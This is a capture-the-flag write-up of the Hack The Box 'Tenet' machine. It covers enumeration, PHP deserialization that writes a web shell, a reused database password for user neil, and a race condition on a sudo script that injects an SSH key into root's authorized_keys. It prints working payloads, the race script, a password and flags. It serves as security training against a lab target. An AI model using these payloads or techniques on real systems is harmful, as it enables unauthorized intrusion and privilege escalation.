HTB: Tenet

Hello there my friends! My name is Dot. And I am here, to tell you, how I solved the Tenet machine, which I really liked. To get the first shell as www-data we will have to exploit a PHP object injection vulnerability, from there we will have to find some credentials to log in as Neil. And as last, to get the root, we will have to exploit a script that we can execute with sudo perms without password. So lets start :)

Enumeration

nmap

nmap shows only SSH (TCP 22) and HTTP (80 TCP) open:

root@kali:~# nmap -p- -T5 -vv 10.10.10.223 -o fullports.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-23 10:14 CET
Nmap scan report for tenet.htb (10.10.10.223)
Host is up (0.14s latency).
Not shown: 65510 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http

Nmap done: 1 IP address (1 host up) scanned in 160.67 seconds

root@kali:~# nmap -p22,80 -sC -sV -T5 -o ports.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-23 10:21 CET
Nmap scan report for tenet.htb (10.10.10.223)
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.6
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Tenet
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.10 seconds

dirsearch

As usual, I ran a dirsearch, with all extensions by default, although I edited the files and added more extensions. To add more extensions by default, simply edit the file dirsearch/lib/core/core/ArgumentParser.py and add all the extensions you want with the following format "ext1,ext2,...extn" without spaces. These are the extensions that I have added. ",,php,asp,aspx,jsp,js,html,do,action,txt,sh,db,py,pdf,phtml,bak" My configuration file looks like this:

root@kali:~# dirsearch -u "10.10.10.223" -E -r -R3 -t400

403   277B   http://10.10.10.223:80/.php
301   316B   http://10.10.10.223:80//wordpress
200    11KB  http://10.10.10.223:80/
403   277B   http://10.10.10.223:80/.ht_wsr.txt
403   277B   http://10.10.10.223:80/.htaccess-marco
403   277B   http://10.10.10.223:80/.htaccess.BAK
403   277B   http://10.10.10.223:80/.hta
403   277B   http://10.10.10.223:80/.htaccess.bak1
403   277B   http://10.10.10.223:80/.htaccess-local
403   277B   http://10.10.10.223:80/.htpasswd_test
403   277B   http://10.10.10.223:80/.htpasswd-old
403   277B   http://10.10.10.223:80/.htaccess-dev
403   277B   http://10.10.10.223:80/.htaccess~
403   277B   http://10.10.10.223:80/.htaccessOLD
403   277B   http://10.10.10.223:80/.htpasswds
403   277B   http://10.10.10.223:80/.htaccessBAK
403   277B   http://10.10.10.223:80/.htusers
403   277B   http://10.10.10.223:80/.htaccessOLD2
403   277B   http://10.10.10.223:80/.htgroup
403   277B   http://10.10.10.223:80/.htaccess_sc
403   277B   http://10.10.10.223:80/.htaccess.save
403   277B   http://10.10.10.223:80/.htaccess.txt
403   277B   http://10.10.10.223:80/.htaccess.sample
403   277B   http://10.10.10.223:80/.htaccess_orig
403   277B   http://10.10.10.223:80/.htaccess.orig
403   277B   http://10.10.10.223:80/.htaccess_extra
403   277B   http://10.10.10.223:80/.htaccess.old
200    11KB  http://10.10.10.223:80/index.html
403   277B   http://10.10.10.223:80/server-status
403   277B   http://10.10.10.223:80/server-status/
200     8B   http://10.10.10.223:80/users.txt

As we can see there are many directories which we have a 403 and coincidentally all start something like .ht... This is due to the policies they have defined in the apache2.conf file. That more or less say something like "All requests to files starting with .ht return a 403" and even if that file does not exist a 403 will be returned. Therefore to focus better on the directories from now on I will omit these directories. So these are the directories that are currently important

root@kali:~# cat directorios.txt | grep -v 277

301   316B   http://10.10.10.223:80//wordpress
200    11KB  http://10.10.10.223:80/
200    11KB  http://10.10.10.223:80/index.html
200     8B   http://10.10.10.223:80/users.txt

If we visit index.html we see that it is the default apache installation page. With a curl to users.txt we can see that it only says Success, that we will see later, where this file comes from.

root@kali:~# curl -ks http://10.10.10.223/users.txt ; echo
Success

For now let's focus on the wordpress directory. If we enter, we can see a broken page of wordpress. What I always do here and I recommend to you, is to look at the source code of the page and look at the links, because most of the time, they will point to the hostname. Which in this case, we can see that it is tenet.htb

So lets add tenet.htb to our /etc/hosts and let's enter in it. Mmmm here is something strange, when we enter through the hostname we are directly in the wordpress page, the default apache installation page is not there anymore. If we ran a dirsearch we can see:

root@kali:~# dirsearch -u "10.10.10.223" -E -t400

200    10KB  http://tenet.htb:80/
301     0B   http://tenet.htb:80/index.php
200    19KB  http://tenet.htb:80/license.txt
200     7KB  http://tenet.htb:80/readme.html
301   309B   http://tenet.htb:80/wp-admin
302     0B   http://tenet.htb:80/wp-admin/
200     0B   http://tenet.htb:80/wp-config.php
409     3KB  http://tenet.htb:80/wp-admin/setup-config.php
200     1KB  http://tenet.htb:80/wp-admin/install.php
301   311B   http://tenet.htb:80/wp-content
200     0B   http://tenet.htb:80/wp-content/
200    69B   http://tenet.htb:80/wp-content/plugins/akismet/akismet.php
200   963B   http://tenet.htb:80/wp-content/uploads/
200     0B   http://tenet.htb:80/wp-includes/rss-functions.php
200     6KB  http://tenet.htb:80/wp-login.php
301   312B   http://tenet.htb:80/wp-includes
405    42B   http://tenet.htb:80/xmlrpc.php
200    48KB  http://tenet.htb:80/wp-includes/
200     0B   http://tenet.htb:80/wp-content/

The users.txt file, is also missing. So, what I thought, is that the server was organized in the following way: (Check this in Beyond root)

The thing is, that there are a couple of posts and one of them talked about migrating the server, in this same post there is a comment that is quite interesting: "did you remove the sator php file and the backup?? the migration program is incomplete! why would you do this?! -neil-"

I immediately started searching like crazy in all possible directories for the sator.php file and the backup. But nothing, I even enumerated the subdomains with wfuzz but no luck.

I was about to go to sleep. When I realized that it could be in the server root, not in the hostname. And so it was. When I put http://10.10.10.223/sator.php in the url and hit enter... A wonderful page appeared in front of my eyes.

So if the comment is not wrong... there should also be a backup. I tried to access sator.bak, and nothing, but then I accessed sator.php.bak... and a little message to download the file appeared. And this is where the fun part of the machine begins.

Shell as www-data

PHP Obejct Injection

Thanks to previous machines I had done I knew that there were deserialization vulnerabilities in at least three languages: Python, PHP and Java. Now, take a look at the code

Have you seen it? The unserialize function is being applied directly, without any sanitation filter, on a variable that we control (Lines 23/24). Sounds tasty, right?

To understand this part, first I have to explain some basic concepts about PHP serialization and deserialization.

Structure of a serialized data on PHP

"Data type: data" 

b:boolean; 
i:integer; 
d:float; 
s:string_length: "string_content"; 
a:element_number:{elements}; //a for array
O:length_class_name:"Class_name":number_properties:{properties} //O for object

Example:
For a class called user, with 2 properties (rol and username) with the values (admin and test12). The serialized data would be:

O:4:"user":2:{s:3:"rol";s:5:"admin";s:8:"username";s:6:"test12"}

PHP has magic methods, and, in order to exploit the deserealization in PHP we are going to abuse two of them, which are:
· __wakeup():
· __destruct():

These methods are called automatically when unserialize() is called. unserialize() takes a string (representing a serialized object) and converts it back to a PHP object. The process of unserialize(), in a few words, is as follows:

1) unserialize() creates a copy of the serialized string which specifies the class and its properties. It will look for the __wakeup() function and execute the code inside it. __wakeup() reconstructs any resources the object may have. It is used to reestablish any database connections lost during serialization and perform other reset tasks.

2) The program operates on the object and uses it to perform other actions.

3) Finally, when there are no more references to the deserialized object, __destruct() is called.

So if we look at the code again, we can see something very interesting:

 public function __destruct()
 {
     file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
     echo '[] Database updated <br>';
 //  echo 'Gotta get this working properly...';
 }

As we have already seen, when unserialize finishes, it calls the __destruct() function. Which will execute the following:

file_put_contents(): Write data to a file

__DIR__ . '/' : The path to write/create the file. In this case, is pointing to the root of the server ('/')

$this->user_file: The filename. Which in this case is $user_file and is pointing to users.txt (If filename does not exist, the file is created).

$this->data: The data to write. Which is $data and is pointing to "Success"

Sooo, once I've explained this... can you imagine where this is going? Exactly, we have to create a malicious serialized string and pass it through the arepo parameter.

As we can see from the code, there is a DatabaseExport class defined, which is formed by two properties ($user_file and $data) and two methods (update_db and __destruct). Our goal, is to create a malicious serialized string of the DatabaseExport class, with the values we want, this way, when __destruct is called, it will execute file_put_contents() with the values we have defined.

If we look at the small schematic above, it would look something like this: (Please note that the numbers of the lengths may vary. So, depending on the words you specify, you will have to enter that number of characters.)

O:14:"DatabaseExport":2:{s:9:"user_file";s:8:"test.txt";s:4:"data";s:17:"this is a text :)";}

Lets, send this:

And if we enter to /test.txt... Whoala :)

It seems to work perfectly, doesn't it? Now let's try to create a php file and write a little shell. The malicious serialized string that I created for this, is:

O:14:"DatabaseExport":2:{s:9:"user_file";s:7:"dot.php";s:4:"data";s:30:"<?php system($_GET['dot']); ?>";}

Once we send it, the file will be created, and we will be able to execute commands.

Let's get our rev shell. For this I will use a bash reverse shell, thanks to the rshell tool which you can find in my GitHub.

I will then intercept a request with Burpsuite, url encode the reverse shell and send the request with the encoded rev shell.

Aaaand, we got it :)

Priv: www-data -> neil

Lets upgrade the shell:

export TERM=xterm
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z

In bash
stty raw -echo
fg + Double enter

In zsh
stty raw -echo ; fg + Double enter

If we try to read the flag user.txt as www-data, we will see that we don't have enough perms, so we must log in as neil first. The first thing that came to my mind was, that maybe the user login credentials were in the wordpress database, so I looked in the file /var/www/html/wordpress/wp-config.php for the database credentials, and bingo, there they were. neil:Opera2112

But before connecting to mysql, I tried ``su neil`` and ``Opera2112`` as password, and I was in :)

Let's grab the flag:

neil@tenet:~$ cat user.txt 
787001938196685e167bff5fd3e97469

Priv neil -> root

The first thing I did was to check the permissions with sudo -l. And I noticed that there was a script, that we can execute as sudo:

Matching Defaults entries for neil on tenet:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:

User neil may run the following commands on tenet:
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh

If we look at the permissions of that file, we can see that we can read the script. Here is the content:

#!/bin/bash

checkAdded() {

	sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)

	if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then

		/bin/echo "Successfully added $sshName to authorized_keys file!"

	else

		/bin/echo "Error in adding $sshName to authorized_keys file!"

	fi

}

checkFile() {

	if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then

		/bin/echo "Error in creating key file!"

		if [[ -f $1 ]]; then /bin/rm $1; fi

		exit 1

	fi

}

addKey() {

	tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

	(umask 110; touch $tmpName)

	/bin/echo $key >>$tmpName

	checkFile $tmpName

	/bin/cat $tmpName >>/root/.ssh/authorized_keys

	/bin/rm $tmpName

}

key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu"
addKey
checkAdded

In order to facilitate the priv escalation, I will first explain what each part of the script does, and where and how we could exploit it.

checkAdded()
$sshName= root@ubuntu
Check that root@ubuntu is in the file, as follows: Verify that the length of the returned string is not equal to 0. If it is equal to 0 it means that grep has not found anything, so root@ubuntu does not exist.

checkFile()
Check that the argument it receives is a file and is not empty OR that the file we pass it is not a regular file.

addKey()

  1. Create the variable $tmpName, which stores a temporary directory.
  2. Then assign it rw permissions for everyone, and writes the id_rsa.pub in the file.
  3. Next, calls checkFile on this temporary file. And if it passes the checks of checkFile(), put the content of this temporary file in the authorized_keys of the root.
  4. Finally delete the temporary file

As we can see, it uses absolute routes, which means that we could not do PATH hijacking. The first thing that came to my mind, was to try to be faster than the script, at the time of putting the content of the temporary file, in the authorized_keys of the root.

For this, I made a while True loop, in which as soon as a file starting with ssh-XXXXXXXX is created, where X can be any letter or number, my private id_rsa will be added to that file. This is the script I have created in order to achieve it.

#!/bin/bash

while true; do

	file=$(ls /tmp/| grep ssh-)
	echo "Your id_rsa.pub" 2>/dev/null >> "$file"
done

But to get our script to run correctly, we need to run the sudo /usr/local/bin/enableSSH.sh script while running our script. So, how can we run both at the same time?. Very simple, we can log in via SSH with neil's credentials, or run ./script & (to leave it in the background) and then run sudo /usr/local/bin/enableSSH.sh

We may have to run sudo /usr/local/bin/enableSSH.sh more than one time, to get the script to execute successfully.

And we can grab the flag:

root@tenet:~# cat root.txt 
1c8dbbd5eaac9df85403d88b971b8046

Beyond root

If we check the /etc/apache2/sites-enabled/tenet.htb.conf file, we can see that we were right, since, as we can see, the root of tenet.htb is set in /var/www/html/wordpress

root@tenet:/var/www/html# cat /etc/apache2/sites-enabled/tenet.htb.conf 
<VirtualHost *:80>
	
    	snip

	ServerAdmin webmaster@tenet.htb
	ServerName tenet.htb
	ServerAlias www.tenet.htb
	DocumentRoot /var/www/html/wordpress

	snip

</VirtualHost>